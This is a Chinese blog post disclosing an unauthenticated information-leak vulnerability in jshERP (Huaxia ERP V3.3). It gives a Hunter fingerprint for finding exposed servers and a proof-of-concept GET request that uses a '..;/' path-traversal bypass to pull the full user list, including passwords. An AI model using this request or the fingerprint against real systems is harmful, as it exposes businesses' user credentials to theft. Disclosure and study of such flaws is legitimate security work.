首页 > 其他分享 >华夏ERPV3.3存在信息泄漏漏洞

华夏ERPV3.3存在信息泄漏漏洞

时间:2024-08-21 18:56:44浏览次数:13  
标签:泄漏 .. jshERP boot 信息 漏洞 537.36 ERPV3.3

1 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

2 漏洞描述


jshERP立志为中小企业提供开源好用的ERP软件,降低企业的信息化成本,目前专注进销存+财务功能。主要模块有零售管理、入库管理、出库管理、组装拆卸、财务管理、报表查询、基础数据、系统管理等。支持预付款、收入支出、仓库调拨、采购销售、礼品卡等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面,精确到每个按钮和菜单。

该系统存在敏感信息泄露漏洞,通过此漏洞攻击者可以获取系统用户,登录用户名,密码,职位等个人敏感信息。

3.漏洞复现

hunter:web.icon=="f6efcd53ba2b07d67ab993073c238a11"

 

 poc

GET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

 

 

 

 

标签:泄漏,..,jshERP,boot,信息,漏洞,537.36,ERPV3.3
From: https://blog.csdn.net/weixin_45790890/article/details/141368235

相关文章

  • SQL手工注入漏洞测试(MongoDB数据库)
    此次靶场地址为:墨者学院⼀.如下给出的源码...可以看到数据库查询的语句如下..构造回显测试... new_list.php?id=1'});return({title:'1',content:'2⼆.成功显示“1”和“2”。可以在此来显示想要查询的数据。接下来开始尝试构造payload查询当前数据库。通过回显观......
  • 【计算机人接私活】手把手教你上手挖到第一个漏洞,从底薪3k到月入过万,只有一步之遥!
     计算机人想接靠谱的私活?看这篇!暑假想做兼职赚生活费?看这篇!挖漏洞找不到门路?看这篇!挖漏洞必备工具Up入行网安多年,一直在探索副业项目。从最初的月薪5k,到现在一个漏洞就能赚12k,副业赚的钱已经是主业的三倍!现在就将自己的经验和干货分享给大家:首先是挖漏洞工具,安装......
  • 【计算机人接私活】手把手教你上手挖到第一个漏洞,从底薪3k到月入过万,只有一步之遥!
     计算机人想接靠谱的私活?看这篇!暑假想做兼职赚生活费?看这篇!挖漏洞找不到门路?看这篇!挖漏洞必备工具Up入行网安多年,一直在探索副业项目。从最初的月薪5k,到现在一个漏洞就能赚12k,副业赚的钱已经是主业的三倍!现在就将自己的经验和干货分享给大家:首先是挖漏洞工具,安装......
  • 「漏洞复现」微商城系统 goods.php SQL注入漏洞
    0x01 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需......
  • 模糊测试结果分析与漏洞利用开发(第二篇)
    一、概述模糊测试的最终目的是发现并利用软件中的安全漏洞。在第一篇文章中,我们讲解了如何设计高效的模糊测试策略。本文将进一步深入,探讨如何分析模糊测试的结果,确认漏洞的存在,并开发相应的漏洞利用工具。二、崩溃样本的分类与分析1.崩溃样本的初步分类模糊测试通常会生......
  • Wordpress漏洞
    WPScanWPScan是KaliLinux默认自带针对wordpress的一款扫描神器1、刺探基础信息:wpscan--urlhttp://www.example.com2、猜解后台用户名wpscan--urlhttp://www.example.com--enumerateu3、使用字典暴破用户名admin的密码wpscan--urlhttp://www.example.com-Pp......
  • 奥威亚云视频平台UploadFile.aspx存在文件上传漏洞
    1前言免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!2漏洞描述为了满足高校培养人才和教学管理的需求,顺应时......
  • BT5 2011.3.漏洞发现.3(nessus)
    第四部分SMB工具 1.SamrdumpTheSamrdumpisanapplicationthatretrievessensitiveinformationaboutthespecifiedtargetusingSecurityAccountManager(SAM),aremoteinterfacewhichisaccessibleundertheDistributedComputingEnvironment/RemoteProced......
  • BT5 2011.3.漏洞发现.2(http smb)
    第三部分HTTP工具 1.BurpSuite(1)BurpSuiteisacombinationofpowerfulwebapplicationsecuritytools.Thesetoolsdemonstratethereal-worldcapabilitiesofanattackerpenetratingthewebapplications.Itcanscan,analyze,andexploitthewebapplications......
  • BT5 2011.3.漏洞发现.1(cisco snmp)
    3.漏洞发现 内容简介第一部分:Cisco工具第二部分:SNMP工具第三部分:HTTP工具第四部分:SMB工具第五部分:综合漏洞发现工具Nessus 第一部分Cisco工具 拓扑介绍 1.CiscoAuditingToolCiscoAuditingTool(CAT)isaminisecurityauditingtool.ItscanstheCiscor......